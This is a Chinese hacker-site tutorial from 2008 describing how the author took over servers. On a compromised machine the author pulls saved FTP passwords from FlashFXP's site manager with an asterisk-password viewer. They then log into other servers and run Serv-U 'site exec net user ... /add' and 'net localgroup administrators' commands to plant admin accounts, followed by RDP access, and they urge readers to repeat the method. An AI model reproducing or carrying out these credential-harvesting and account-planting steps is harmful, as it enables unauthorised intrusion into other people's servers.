通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
利用管理员的粗心捡肉鸡!
责任编辑:酷酷の鱼   更新日期:2008-5-2
 

来源:华夏黑客联盟 作者:职业色狼

前几天借朋友一台肉鸡,有一天又上去看了一下。发现这台肉鸡的桌面上有个FlashFXP,FlashFXP是功能强大的FXP/FTP软件,融合了一些其他优秀FTP软件的优点,如像CuteFTP一样可以比较文件夹,支持彩色文字显示;像BpFTP支持多文件夹选择文件,能够缓存文件夹;像LeapFTP一样的外观界面,甚至设计思路也差相仿佛.支持文件夹 (带子文件夹)的文件传送、删除;支持上传、下载及第三方文件续传;可以跳过指定的文件类型,只传送需要的文件;可以自定义不同文件类型的显示颜色;可以缓存远端文件夹列表,支持FTP代理及 Socks 4&5;具有避免空闲功能,防止被站点踢出;可以显示或隐藏“隐藏”属性的文件、文件夹;支持每个站点使用被动模式等.
    但是这个工具有个弱点,我下载了服务器上的ftp文件,点开菜单栏的站点按纽,选择站点管理器。如图1。


可以看到管理员以前连接过的ftp都会记录在这里面,而且保存了密码。这个密码是星号的,可以通过星号密码查看工具来显示,此工具下载地址http://www.onlinedown.net/soft/28712.htm
 

打开星号密码查看器,把鼠标移动到星号密码处,可以看到密码是xxxivot,在服务器上我看见serv-u的配置勾选了执行,这样我们登陆后就可以执行命令。如图
 

而且每个服务器的帐号都是cz,这样大胆测试一下。ftp 219.138.xx.23 输入帐号cz 输入密码时不显示,回车显示230 登陆成功,执行quote site exec net user hxhack hxhack /add 回显200 成功建立一个帐户,quote site exec net localgroup administrators hxhack /add 成功添加到管理员组。
 

用3389登陆一下果然进去了。
 

呵呵打开flashfxp依次把所有服务器IP复制出来,ftp登陆进去按刚才方法逐个添加个用户并成功进入服务器。
 

这次能成功得手也是因为管理员的懒惰和粗心,也告诉了大家不必非得天天拿个扫描器到处扫,平时思维发挥一下,比如在服务器或者webshell里发现诸如此类的软件或者密码都可以去尝试,说不定就有意外的收获。

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    固顶文章 企业网络组建与维护班正式开课
    普通文章 瑞星公司05月02日发布 每日计算机病毒及木马播报
    普通文章 恶意软件作者竟然也要保护知识产权
    普通文章 电影防毒网购防骗 专家支招五一安全
    普通文章 黑客觊觎北京奥运 中国全天监控奥运黑客
    普通文章 江民病毒播报:谨防魔兽木马窃取网游信息
    普通文章 传微软留USB驱动后门可进行硬盘扫描
    普通文章 两黑客偷改学生成绩档案牟利被获刑
    普通文章 法国网站做抵制奥运调查遭攻击
    普通文章 利用管理员的粗心捡肉鸡!
    热门文章
    普通文章Paypal否认“封杀”Safari等浏览器
    普通文章韩国最大拍卖网站千万用户资料丢失
    普通文章中国黑客攻陷CNN旗下体育网站
    普通文章Google 电子表格文档服务爆高危跨站脚本攻击漏洞
    普通文章美俄为垃圾邮件大户 每3秒出现一个垃圾网页
    普通文章网络"牛皮癣"惹人厌 电脑用户需谨慎提防
    普通文章沪信息委:近期预防3种计算机病毒侵袭
    普通文章警惕:批上IE外衣病毒 欺骗用户点击运行
    普通文章安全课堂:建立防火墙主动性网络安全防护
    推荐文章推荐:从此不受侵扰 电脑安全防护的7种武器
    精彩专题